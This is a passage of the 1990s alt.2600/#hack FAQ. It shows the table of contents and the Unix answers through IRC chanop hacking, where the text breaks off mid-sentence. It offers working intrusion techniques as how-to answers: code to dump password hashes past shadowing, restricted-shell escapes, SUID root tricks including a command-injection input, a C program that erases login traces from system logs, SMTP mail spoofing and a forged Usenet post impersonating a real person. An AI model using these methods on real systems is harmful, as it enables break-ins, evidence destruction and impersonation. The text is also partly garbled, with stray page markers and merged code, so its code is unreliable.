4663 lines
245 KiB
Plaintext
4663 lines
245 KiB
Plaintext
|
#hack FAQ
|
|||
|
#HACK FAQ
|
|||
|
EDITORS NOTE: WELCOME TO BETA .008 OF THE ALT.2600/#HACK FAQ!
|
|||
|
|
|||
|
THE FAQ SUFFERED FROM A FLOPPY DISK CRASH. I BELIEVE
|
|||
|
I HAVE CORRECTED ALL ERRORS RESULTING FROM THE CRASH.
|
|||
|
IF YOU FIND ANY THAT I MISSED, PLEASE E-MAIL ME.
|
|||
|
|
|||
|
THIS EDITION OF THE FAQ IS DEDICATED TO TARAN KING, WHO
|
|||
|
HAS PUT IN MANY LONG HOURS KEEPING THE HTML VERSION OF
|
|||
|
THIS DOCUMENT UP TO DATE.
|
|||
|
|
|||
|
|
|||
|
IF YOU HAVE A QUESTIONS REGARDING ANY OF THE TOPICS
|
|||
|
|
|||
|
COVERED IN THE FAQ, PLEASE DIRECT IT TO ALT.2600 OR
|
|||
|
|
|||
|
#HACK. PLEASE DO NOT E-MAIL ME WITH THEM, I'M GETTING
|
|||
|
|
|||
|
SWAMPED.
|
|||
|
|
|||
|
|
|||
|
IF YOUR COPY OF THE #HACK FAQ DOES NOT END WITH THE
|
|||
|
|
|||
|
#hack FAQ (24/25)
|
|||
|
LETTERS EOT ON A LINE BY THEMSELVES, YOU DO NOT HAVE THE
|
|||
|
|
|||
|
ENTIRE FAQ.
|
|||
|
|
|||
|
THANKS GO OUT TO BORIS GINSBURGS FOR HIS WORK IN SPELL
|
|||
|
CHECKING THE FAQ!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
** BETA **
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BETA REVISION .008
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (24/47)
|
|||
|
ALT.2600/#HACK F.A.Q.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
BY
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VOYAGER
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WILL@GNU.AI.MIT.EDU
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SYSOP OF
|
|||
|
|
|||
|
#hack FAQ (27/72)
|
|||
|
HACKER'S HAVEN
|
|||
|
|
|||
|
|
|||
|
|
|||
|
(303)343-4053
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WITH SPECIAL THANKS TO:
|
|||
|
|
|||
|
|
|||
|
A-FLAT, AL, ALEPH1, BLUESMAN, C-CURVE, EDISON, KCROW, MAJOR,
|
|||
|
|
|||
|
PRESENCE, ROGUE AGENT, SBIN, TARAN KING, TOMES AND THESAINT.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
WE WORK IN THE DARK
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (27/94)
|
|||
|
WE DO WHAT WE CAN
|
|||
|
|
|||
|
|
|||
|
WE GIVE WHAT WE HAVE
|
|||
|
|
|||
|
|
|||
|
OUR DOUBT IS OUR PASSION,
|
|||
|
|
|||
|
|
|||
|
AND OUR PASSION IS OUR TASK
|
|||
|
|
|||
|
|
|||
|
THE REST IS THE MADNESS OF ART.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-- HENRY JAMES
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (27/116)
|
|||
|
SECTION A: COMPUTERS
|
|||
|
|
|||
|
01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX?
|
|||
|
02. HOW DO I CRACK UNIX PASSWORDS?
|
|||
|
03. WHAT IS PASSWORD SHADOWING?
|
|||
|
N 04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED?
|
|||
|
05. WHAT IS NIS/YP?
|
|||
|
N 06. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE?
|
|||
|
07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS?
|
|||
|
08. HOW DO I CRACK VMS PASSWORDS?
|
|||
|
09. HOW DO I BREAK OUT OF A RESTRICTED SHELL?
|
|||
|
10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM?
|
|||
|
11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS?
|
|||
|
12. HOW DO I SEND FAKEMAIL?
|
|||
|
13. HOW DO I FAKE POSTS TO USENET?
|
|||
|
14. HOW DO I HACK CHANOP ON IRC?
|
|||
|
15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME?
|
|||
|
16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM?
|
|||
|
U 17. WHAT IS ETHERNET SNIFFING?
|
|||
|
18. WHAT IS AN INTERNET OUTDIAL?
|
|||
|
19. WHAT ARE SOME INTERNET OUTDIALS?
|
|||
|
U 20. WHAT IS THIS SYSTEM?
|
|||
|
|
|||
|
#hack FAQ (27/138)
|
|||
|
U 21. WHAT ARE THE DEFAULT ACCOUNTS FOR XXX ?
|
|||
|
U 22. WHAT PORT IS XXX ON?
|
|||
|
23. WHAT IS A TROJAN/WORM/VIRUS/LOGIC BOMB?
|
|||
|
24. HOW CAN I PROTECT MYSELF FROM VIRII AND SUCH?
|
|||
|
25. WHAT IS CRYPTOXXXXXXX?
|
|||
|
26. WHAT IS PGP?
|
|||
|
27. WHAT IS TEMPEST?
|
|||
|
28. WHAT IS AN ANONYMOUS REMAILER?
|
|||
|
29. WHAT ARE THE ADDRESSES OF SOME ANONYMOUS REMAILERS?
|
|||
|
30. HOW DO I DEFEAT COPY PROTECTION?
|
|||
|
|
|||
|
|
|||
|
SECTION B: TELEPHONY
|
|||
|
|
|||
|
01. WHAT IS A RED BOX?
|
|||
|
02. HOW DO I BUILD A RED BOX?
|
|||
|
U 03. WHERE CAN I GET A 6.5536MHZ CRYSTAL?
|
|||
|
04. WHICH PAYPHONES WILL A RED BOX WORK ON?
|
|||
|
05. WHAT IS A BLUE BOX?
|
|||
|
06. DO BLUE BOXES STILL WORK?
|
|||
|
07. WHAT IS A BLACK BOX?
|
|||
|
08. WHAT DO ALL THE COLORED BOXES DO?
|
|||
|
|
|||
|
#hack FAQ (27/160)
|
|||
|
N 09. WHAT IS AN ANAC NUMBER?
|
|||
|
U 10. WHAT IS THE ANAC NUMBER FOR MY AREA?
|
|||
|
11. WHAT IS A RINGBACK NUMBER?
|
|||
|
12. WHAT IS THE RINGBACK NUMBER FOR MY AREA?
|
|||
|
13. WHAT IS A LOOP?
|
|||
|
14. WHAT IS A LOOP IN MY AREA?
|
|||
|
U 15. WHAT IS A CNA NUMBER?
|
|||
|
16. WHAT IS THE TELEPHONE COMPANY CNA NUMBER FOR MY AREA?
|
|||
|
N 17. WHAT ARE SOME NUMBERS THAT ALWAYS RING BUSY?
|
|||
|
N 18. WHAT ARE SOME NUMBERS THAT TEMPORARILY DISCONNECT PHONE SERVICE?
|
|||
|
19. WHAT IS SCANNING?
|
|||
|
20. IS SCANNING ILLEGAL?
|
|||
|
U 21. WHERE CAN I PURCHASE A LINEMAN'S HANDSET?
|
|||
|
22. WHAT ARE THE DTMF FREQUENCIES?
|
|||
|
N 23. WHAT ARE ALL OF THE * CODES?
|
|||
|
N 24. WHAT FREQUENCIES DO CORDLESS PHONES OPERATE ON?
|
|||
|
|
|||
|
|
|||
|
SECTION C: RESOURCES
|
|||
|
|
|||
|
U 01. WHAT ARE SOME FTP SITES OF INTEREST TO HACKERS?
|
|||
|
U 02. WHAT ARE SOME NEWSGROUPS OF INTEREST TO HACKERS?
|
|||
|
|
|||
|
#hack FAQ (27/182)
|
|||
|
03. WHAT ARE SOME TELNET SITES OF INTEREST TO HACKERS?
|
|||
|
04. WHAT ARE SOME GOPHER SITES OF INTEREST TO HACKERS?
|
|||
|
U 05. WHAT ARE SOME WORLD WIDE WEB (WWW) SITES OF INTEREST TO HACKERS?
|
|||
|
06. WHAT ARE SOME IRC CHANNELS OF INTEREST TO HACKERS?
|
|||
|
U 07. WHAT ARE SOME BBS'S OF INTEREST TO HACKERS?
|
|||
|
08. WHAT BOOKS ARE AVAILABLE ON THIS SUBJECT?
|
|||
|
09. WHAT ARE SOME MAILING LISTS OF INTEREST TO HACKERS?
|
|||
|
U 10. WHAT ARE SOME PRINT MAGAZINES OF INTEREST TO HACKERS?
|
|||
|
11. WHAT ARE SOME ORGANIZATIONS OF INTEREST TO HACKERS?
|
|||
|
N 12. WHERE CAN I PURCHASE A MAGNETIC STRIPE ENCODER/DECODER?
|
|||
|
|
|||
|
SECTION D: 2600
|
|||
|
|
|||
|
01. WHAT IS ALT.2600?
|
|||
|
02. WHAT DOES "2600" MEAN?
|
|||
|
03. ARE THERE ON-LINE VERSIONS OF 2600 AVAILABLE?
|
|||
|
04. I CAN'T FIND 2600 AT ANY BOOKSTORES. WHAT CAN I DO?
|
|||
|
U 05. WHY DOES 2600 COST MORE TO SUBSCRIBE TO THAN TO BUY AT A NEWSSTAND?
|
|||
|
|
|||
|
|
|||
|
SECTION E: MISCELLANEOUS
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (27/204)
|
|||
|
U 01. WHAT DOES XXX STAND FOR?
|
|||
|
02. HOW DO I DETERMINE IF I HAVE A VALID CREDIT CARD NUMBER?
|
|||
|
03. WHERE CAN I GET A COPY OF THE #HACK FAQ?
|
|||
|
N 04. WHAT ARE THE ETHICS OF HACKING?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
U == UPDATED SINCE LAST RELEASE OF THE #HACK FAQ
|
|||
|
N == NEW SINCE LAST RELEASE OF THE #HACK FAQ
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECTION A: COMPUTERS
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX?
|
|||
|
|
|||
|
IN STANDARD UNIX THE PASSWORD FILE IS /ETC/PASSWD. ON A UNIX SYSTEM
|
|||
|
WITH EITHER NIS/YP OR PASSWORD SHADOWING, MUCH OF THE PASSWORD DATA
|
|||
|
MAY BE ELSEWHERE.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (28/227)
|
|||
|
02. HOW DO I CRACK UNIX PASSWORDS?
|
|||
|
|
|||
|
CONTRARY TO POPULAR BELIEF, UNIX PASSWORDS CANNOT BE DECRYPTED. UNIX
|
|||
|
PASSWORDS ARE ENCRYPTED WITH A ONE WAY FUNCTION. THE LOGIN PROGRAM
|
|||
|
ENCRYPTS THE TEXT YOU ENTER AT THE "PASSWORD:" PROMPT AND COMPARES
|
|||
|
THAT ENCRYPTED STRING AGAINST THE ENCRYPTED FORM OF YOUR PASSWORD.
|
|||
|
|
|||
|
PASSWORD CRACKING SOFTWARE USES WORDLISTS. EACH WORD IN THE WORDLIST
|
|||
|
IS ENCRYPTED WITH EACH OF THE 4096 POSSIBLE SALT VALUES AND THE
|
|||
|
RESULTS ARE COMPARED TO THE ENCRYPTED FORM OF THE TARGET PASSWORD.
|
|||
|
|
|||
|
THE BEST CRACKING PROGRAM FOR UNIX PASSWORDS IS CURRENTLY CRACK BY
|
|||
|
ALEC MUFFETT. FOR PC-DOS, THE BEST PACKAGE TO USE IS CURRENTLY
|
|||
|
CRACKERJACK.
|
|||
|
|
|||
|
|
|||
|
03. WHAT IS PASSWORD SHADOWING?
|
|||
|
|
|||
|
PASSWORD SHADOWING IS A SECURITY SYSTEM WHERE THE ENCRYPTED PASSWORD
|
|||
|
FIELD OF /ETC/PASSWORD IS REPLACED WITH A SPECIAL TOKEN AND THE
|
|||
|
ENCRYPTED PASSWORD IS STORED IN A SEPARATE FILE WHICH IS NOT READABLE
|
|||
|
BY NORMAL SYSTEM USERS.
|
|||
|
|
|||
|
#hack FAQ (29/250)
|
|||
|
TO DEFEAT PASSWORD SHADOWING ON MANY (BUT NOT ALL) SYSTEMS, WRITE A
|
|||
|
PROGRAM THAT USES SUCCESSIVE CALLS TO GETPWENT() TO OBTAIN THE
|
|||
|
PASSWORD FILE.
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
MAIN()
|
|||
|
{
|
|||
|
STRUCT PASSWD *P;
|
|||
|
WHILE(P=GETPWENT())
|
|||
|
PRINTF("%S:%S:%D:%D:%S:%S:%S\N", P->PW_NAME, P->PW_PASSWD,
|
|||
|
P->PW_UID, P->PW_GID, P->PW_GECOS, P->PW_DIR, P->PW_SHELL);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED?
|
|||
|
|
|||
|
UNIX PATH TOKEN
|
|||
|
-----------------------------------------------------------------
|
|||
|
AIX 3 /ETC/SECURITY/PASSWD !
|
|||
|
OR /TCB/AUTH/FILES//
|
|||
|
|
|||
|
#hack FAQ (29/272)
|
|||
|
A/UX 3.0S /TCB/FILES/AUTH/?/*
|
|||
|
BSD4.3-RENO /ETC/MASTER.PASSWD *
|
|||
|
CONVEXOS 10 /ETC/SHADPW *
|
|||
|
CONVEXOS 11 /ETC/SHADOW *
|
|||
|
DG/UX /ETC/TCB/AA/USER/ *
|
|||
|
EP/IX /ETC/SHADOW X
|
|||
|
HP-UX /.SECURE/ETC/PASSWD *
|
|||
|
IRIX 5 /ETC/SHADOW X
|
|||
|
LINUX 0.99 /ETC/SHADOW *
|
|||
|
OSF/1 /ETC/PASSWD[.DIR|.PAG] *
|
|||
|
SCO UNIX #.2.X /TCB/AUTH/FILES//
|
|||
|
SUNOS4.1+C2 /ETC/SECURITY/PASSWD.ADJUNCT ##USERNAME
|
|||
|
SUNOS 5.0 /ETC/SHADOW
|
|||
|
|
|||
|
SYSTEM V RELEASE 4.0 /ETC/SHADOW X
|
|||
|
SYSTEM V RELEASE 4.2 /ETC/SECURITY/* DATABASE
|
|||
|
ULTRIX 4 /ETC/AUTH[.DIR|.PAG] *
|
|||
|
UNICOS /ETC/UDB *
|
|||
|
|
|||
|
|
|||
|
06. WHAT IS NIS/YP?
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (29/294)
|
|||
|
NIS (NETWORK INFORMATION SYSTEM) IN THE CURRENT NAME FOR WHAT WAS ONCE
|
|||
|
KNOWN AS YP (YELLOW PAGES). THE PURPOSE FOR NIS IS TO ALLOW MANY
|
|||
|
MACHINES ON A NETWORK TO SHARE CONFIGURATION INFORMATION, INCLUDING
|
|||
|
PASSWORD DATA. NIS IS NOT DESIGNED TO PROMOTE SYSTEM SECURITY. IF
|
|||
|
YOUR SYSTEM USES NIS YOU WILL HAVE A VERY SHORT /ETC/PASSWD FILE WITH
|
|||
|
A LINE THAT LOOKS LIKE THIS:
|
|||
|
|
|||
|
+::0:0:::
|
|||
|
|
|||
|
TO VIEW THE REAL PASSWORD FILE USE THIS COMMAND "YPCAT PASSWD"
|
|||
|
|
|||
|
|
|||
|
05. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE?
|
|||
|
|
|||
|
THE CHARACTERS ARE PASSWORD AGING DATA. PASSWORD AGING FORCES THE
|
|||
|
USER TO CHANGE PASSWORDS AFTER A SYSTEM ADMINISTRATOR SPECIFIED PERIOD
|
|||
|
OF TIME. PASSWORD AGING CAN ALSO FORCE A USER TO KEEP A PASSWORD FOR
|
|||
|
A CERTAIN NUMBER OF WEEKS BEFORE CHANGING IT.
|
|||
|
|
|||
|
]
|
|||
|
] SAMPLE ENTRY FROM /ETC/PASSWD WITH PASSWORD AGING INSTALLED:
|
|||
|
]
|
|||
|
|
|||
|
#hack FAQ (29/316)
|
|||
|
] WILL:5FG63FHD3D,M.Z8:9406:12:WILL SPENCER:/HOME/FSG/WILL:/BIN/BASH
|
|||
|
]
|
|||
|
|
|||
|
NOTE THE COMMA IN THE ENCRYPTED PASSWORD FIELD. THE CHARACTERS AFTER
|
|||
|
THE COMMA ARE USED BY THE PASSWORD AGING MECHANISM.
|
|||
|
|
|||
|
]
|
|||
|
] PASSWORD AGING CHARACTERS FROM ABOVE EXAMPLE:
|
|||
|
]
|
|||
|
] M.Z8
|
|||
|
]
|
|||
|
|
|||
|
THE FOUR CHARACTERS ARE INTERPRETED AS FOLLOWS:
|
|||
|
|
|||
|
1: MAXIMUM NUMBER OF WEEKS A PASSWORD CAN BE USED WITHOUT CHANGING.
|
|||
|
2: MINIMUM NUMBER OF WEEKS A PASSWORD MUST BE USED BEFORE CHANGING.
|
|||
|
3&4: LAST TIME PASSWORD WAS CHANGED, IN NUMBER OF WEEKS SINCE 1970.
|
|||
|
|
|||
|
THREE SPECIAL CASES SHOULD BE NOTED:
|
|||
|
|
|||
|
IF THE FIRST AND SECOND CHARACTERS ARE SET TO '..' THE USER WILL BE
|
|||
|
FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN. THE
|
|||
|
|
|||
|
#hack FAQ (29/338)
|
|||
|
PASSWD PROGRAM WILL THEN REMOVE THE PASSWD AGING CHARACTERS, AND THE
|
|||
|
USER WILL NOT BE SUBJECTED TO PASSWORD AGING REQUIREMENTS AGAIN.
|
|||
|
|
|||
|
IF THE THIRD AND FOURTH CHARACTERS ARE SET TO '..' THE USER WILL BE
|
|||
|
FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN. PASSWORD
|
|||
|
AGING WILL THEN OCCUR AS DEFINED BY THE FIRST AND SECOND CHARACTERS.
|
|||
|
|
|||
|
IF THE FIRST CHARACTER (MAX) IS LESS THAN THE SECOND CHARACTER (MIN),
|
|||
|
THE USER IS NOT ALLOWED TO CHANGE HIS/HER PASSWORD. ONLY ROOT CAN
|
|||
|
CHANGE THAT USERS PASSWORD.
|
|||
|
|
|||
|
IT SHOULD ALSO BE NOTED THAT THE SU COMMAND DOES NOT CHECK THE PASSWORD
|
|||
|
AGING DATA. AN ACCOUNT WITH AN EXPIRED PASSWORD CAN BE SU'D TO
|
|||
|
WITHOUT BEING FORCED TO CHANGE THE PASSWORD.
|
|||
|
|
|||
|
|
|||
|
PASSWORD AGING CODES
|
|||
|
+------------------------------------------------------------------------+
|
|||
|
| |
|
|||
|
| CHARACTER: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |
|
|||
|
| NUMBER: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
|||
|
| |
|
|||
|
|
|||
|
#hack FAQ (29/360)
|
|||
|
| CHARACTER: I J K L M N O P Q R S T U V W X Y Z A B |
|
|||
|
| NUMBER: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
|||
|
| |
|
|||
|
| CHARACTER: C D E F G H I J K L M N O P Q R S T U V |
|
|||
|
| NUMBER: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
|||
|
| |
|
|||
|
| CHARACTER: W X Y Z |
|
|||
|
| NUMBER: 60 61 62 63 |
|
|||
|
| |
|
|||
|
+------------------------------------------------------------------------+
|
|||
|
|
|||
|
|
|||
|
07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS?
|
|||
|
|
|||
|
UNDER VMS, THE PASSWORD FILE IS SYS$SYSTEM:SYSUAF.DAT. HOWEVER,
|
|||
|
UNLIKE UNIX, MOST USERS DO NOT HAVE ACCESS TO READ THE PASSWORD FILE.
|
|||
|
|
|||
|
|
|||
|
08. HOW DO I CRACK VMS PASSWORDS?
|
|||
|
|
|||
|
WRITE A PROGRAM THAT USES THE SYS$GETUAF FUNCTIONS TO COMPARE THE
|
|||
|
RESULTS OF ENCRYPTED WORDS AGAINST THE ENCRYPTED DATA IN SYSUAF.DAT.
|
|||
|
|
|||
|
#hack FAQ (30/383)
|
|||
|
TWO SUCH PROGRAMS ARE KNOWN TO EXIST, CHECK_PASSWORD AND
|
|||
|
GUESS_PASSWORD.
|
|||
|
|
|||
|
|
|||
|
09. HOW DO I BREAK OUT OF A RESTRICTED SHELL?
|
|||
|
|
|||
|
ON POORLY IMPLEMENTED RESTRICTED SHELLS YOU CAN BREAK OUT OF THE
|
|||
|
RESTRICTED ENVIRONMENT BY RUNNING A PROGRAM THAT FEATURES A SHELL
|
|||
|
FUNCTION. A GOOD EXAMPLE IS VI. RUN VI AND USE THIS COMMAND:
|
|||
|
|
|||
|
:SET SHELL=/BIN/SH
|
|||
|
|
|||
|
THEN SHELL USING THIS COMMAND:
|
|||
|
|
|||
|
:SHELL
|
|||
|
|
|||
|
|
|||
|
10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM?
|
|||
|
|
|||
|
1. CHANGE IFS.
|
|||
|
|
|||
|
IF THE PROGRAM CALLS ANY OTHER PROGRAMS USING THE SYSTEM() FUNCTION
|
|||
|
|
|||
|
#hack FAQ (30/405)
|
|||
|
CALL, YOU MAY BE ABLE TO FOOL IT BY CHANGING IFS. IFS IS THE INTERNAL
|
|||
|
FIELD SEPARATOR THAT THE SHELL USES TO DELIMIT ARGUMENTS.
|
|||
|
|
|||
|
IF THE PROGRAM CONTAINS A LINE THAT LOOKS LIKE THIS:
|
|||
|
|
|||
|
SYSTEM("/BIN/DATE")
|
|||
|
|
|||
|
AND YOU CHANGE IFS TO '/' THE SHELL WILL THEM INTERPRET THE
|
|||
|
PROCEEDING LINE AS:
|
|||
|
|
|||
|
BIN DATE
|
|||
|
|
|||
|
NOW, IF YOU HAVE A PROGRAM OF YOUR OWN IN THE PATH CALLED "BIN" THE
|
|||
|
SUID PROGRAM WILL RUN YOUR PROGRAM INSTEAD OF /BIN/DATE.
|
|||
|
|
|||
|
TO CHANGE IFS, USE THIS COMMAND:
|
|||
|
|
|||
|
IFS='/';EXPORT IFS # BOURNE SHELL
|
|||
|
SETENV IFS '/' # C SHELL
|
|||
|
EXPORT IFS='/' # KORN SHELL
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (30/427)
|
|||
|
2. LINK THE SCRIPT TO -I
|
|||
|
|
|||
|
CREATE A SYMBOLIC LINK NAMED "-I" TO THE PROGRAM. RUNNING "-I"
|
|||
|
WILL CAUSE THE INTERPRETER SHELL (/BIN/SH) TO START UP IN INTERACTIVE
|
|||
|
MODE. THIS ONLY WORKS ON SUID SHELL SCRIPTS.
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
% LN SUID.SH -I
|
|||
|
% -I
|
|||
|
#
|
|||
|
|
|||
|
|
|||
|
3. EXPLOIT A RACE CONDITION
|
|||
|
|
|||
|
REPLACE A SYMBOLIC LINK TO THE PROGRAM WITH ANOTHER PROGRAM WHILE THE
|
|||
|
KERNEL IS LOADING /BIN/SH.
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
NICE -19 SUIDPROG ; LN -S EVILPROG SUIDROOT
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (31/450)
|
|||
|
4. SEND BAD INPUT TO THE PROGRAM.
|
|||
|
|
|||
|
INVOKE THE NAME OF THE PROGRAM AND A SEPARATE COMMAND ON THE SAME
|
|||
|
COMMAND LINE.
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
SUIDPROG ; ID
|
|||
|
|
|||
|
|
|||
|
11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS?
|
|||
|
|
|||
|
EDIT /ETC/UTMP, /USR/ADM/WTMP AND /USR/ADM/LASTLOG. THESE ARE NOT TEXT
|
|||
|
FILES THAT CAN BE EDITED BY HAND WITH VI, YOU MUST USE A PROGRAM
|
|||
|
SPECIFICALLY WRITTEN FOR THIS PURPOSE.
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#hack FAQ (31/472)
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#DEFINE WTMP_NAME "/USR/ADM/WTMP"
|
|||
|
#DEFINE UTMP_NAME "/ETC/UTMP"
|
|||
|
#DEFINE LASTLOG_NAME "/USR/ADM/LASTLOG"
|
|||
|
|
|||
|
INT F;
|
|||
|
|
|||
|
VOID KILL_UTMP(WHO)
|
|||
|
CHAR *WHO;
|
|||
|
{
|
|||
|
STRUCT UTMP UTMP_ENT;
|
|||
|
|
|||
|
IF ((F=OPEN(UTMP_NAME,O_RDWR))>=0) {
|
|||
|
WHILE(READ (F, &UTMP_ENT, SIZEOF (UTMP_ENT))> 0 )
|
|||
|
IF (!STRNCMP(UTMP_ENT.UT_NAME,WHO,STRLEN(WHO))) {
|
|||
|
BZERO((CHAR *)&UTMP_ENT,SIZEOF( UTMP_ENT ));
|
|||
|
LSEEK (F, -(SIZEOF (UTMP_ENT)), SEEK_CUR);
|
|||
|
WRITE (F, &UTMP_ENT, SIZEOF (UTMP_ENT));
|
|||
|
}
|
|||
|
|
|||
|
#hack FAQ (31/494)
|
|||
|
CLOSE(F);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
VOID KILL_WTMP(WHO)
|
|||
|
CHAR *WHO;
|
|||
|
{
|
|||
|
STRUCT UTMP UTMP_ENT;
|
|||
|
LONG POS;
|
|||
|
|
|||
|
POS = 1L;
|
|||
|
IF ((F=OPEN(WTMP_NAME,O_RDWR))>=0) {
|
|||
|
|
|||
|
WHILE(POS != -1L) {
|
|||
|
LSEEK(F,-(LONG)( (SIZEOF(STRUCT UTMP)) * POS),L_XTND);
|
|||
|
IF (READ (F, &UTMP_ENT, SIZEOF (STRUCT UTMP))= 0) {
|
|||
|
LSEEK(F, (LONG)PWD->PW_UID * SIZEOF (STRUCT LASTLOG), 0);
|
|||
|
BZERO((CHAR *)&NEWLL,SIZEOF( NEWLL ));
|
|||
|
WRITE(F, (CHAR *)&NEWLL, SIZEOF( NEWLL ));
|
|||
|
CLOSE(F);
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (31/516)
|
|||
|
} ELSE PRINTF("%S: ?\N",WHO);
|
|||
|
}
|
|||
|
|
|||
|
MAIN(ARGC,ARGV)
|
|||
|
INT ARGC;
|
|||
|
CHAR *ARGV[];
|
|||
|
{
|
|||
|
IF (ARGC==2) {
|
|||
|
KILL_LASTLOG(ARGV[1]);
|
|||
|
KILL_WTMP(ARGV[1]);
|
|||
|
KILL_UTMP(ARGV[1]);
|
|||
|
PRINTF("ZAP2!\N");
|
|||
|
} ELSE
|
|||
|
PRINTF("ERROR.\N");
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
12. HOW DO I SEND FAKEMAIL?
|
|||
|
|
|||
|
TELNET TO PORT 25 OF THE MACHINE YOU WANT THE MAIL TO APPEAR TO
|
|||
|
ORIGINATE FROM. ENTER YOUR MESSAGE AS IN THIS EXAMPLE:
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (31/538)
|
|||
|
HELO BELLCORE.COM
|
|||
|
MAIL FROM:VOYAGER@BELLCORE.COM
|
|||
|
RCPT TO:PRESIDENT@WHITEHOUSE.GOV
|
|||
|
DATA
|
|||
|
|
|||
|
|
|||
|
PLEASE DISCONTINUE YOUR SILLY CLIPPER INITIATIVE.
|
|||
|
.
|
|||
|
QUIT
|
|||
|
|
|||
|
ON SYSTEMS THAT HAVE RFC 931 IMPLEMENTED, SPOOFING YOUR "MAIL FROM:"
|
|||
|
LINE WILL NOT WORK. TEST BY SENDING YOURSELF FAKEMAIL FIRST.
|
|||
|
|
|||
|
|
|||
|
13. HOW DO I FAKE POSTS TO USENET?
|
|||
|
|
|||
|
USE INEWS TO POST. GIVE INEWS THE FOLLOWING LINES:
|
|||
|
|
|||
|
FROM:
|
|||
|
NEWSGROUPS:
|
|||
|
SUBJECT:
|
|||
|
MESSAGE-ID:
|
|||
|
|
|||
|
#hack FAQ (31/560)
|
|||
|
DATE:
|
|||
|
ORGANIZATION:
|
|||
|
|
|||
|
FOR A MODERATED NEWSGROUP, INEWS WILL ALSO REQUIRE THIS LINE:
|
|||
|
|
|||
|
APPROVED:
|
|||
|
|
|||
|
THEN ADD YOUR POST AND TERMINATE WITH .
|
|||
|
|
|||
|
EXAMPLE:
|
|||
|
|
|||
|
FROM: ERIC S. REAL
|
|||
|
NEWSGROUPS: ALT.HACKERS
|
|||
|
SUBJECT: PATHETIC BUNCH OF WANNABE LOSERS
|
|||
|
MESSAGE-ID:
|
|||
|
DATE: FRI, 13 AUG 1994 12:15:03
|
|||
|
ORGANIZATION: MORAL MAJORITY
|
|||
|
|
|||
|
A PATHETIC BUNCH OF WANNABE LOSERS IS WHAT MOST OF YOU ARE, WITH NO
|
|||
|
RIGHT TO STEAL THE HONORABLE TITLE OF `HACKER' TO PUFF UP YOUR SILLY
|
|||
|
ADOLESCENT EGOS. GET STUFFED, GET LOST, AND GO TO JAIL.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (36/587)
|
|||
|
ERIC S. RAYMOND
|
|||
|
|
|||
|
|
|||
|
^D
|
|||
|
|
|||
|
NOTE THAT MANY SYSTEMS WILL APPEND AN ORIGINATOR: LINE TO YOUR MESSAGE
|
|||
|
HEADER, EFFECTIVELY REVEALING THE ACCOUNT FROM WHICH THE MESSAGE WAS
|
|||
|
POSTED.
|
|||
|
|
|||
|
|
|||
|
14. HOW DO I HACK CHANOP ON IRC?
|
|||
|
|
|||
|
FIND A SERVER THAT IS SPLIT FROM THE REST OF IRC AND CREATE YOUR OWN
|
|||
|
CHANNEL THERE USING THE NAME OF THE CHANNEL YOU WANT CHANOP ON. WHEN
|
|||
|
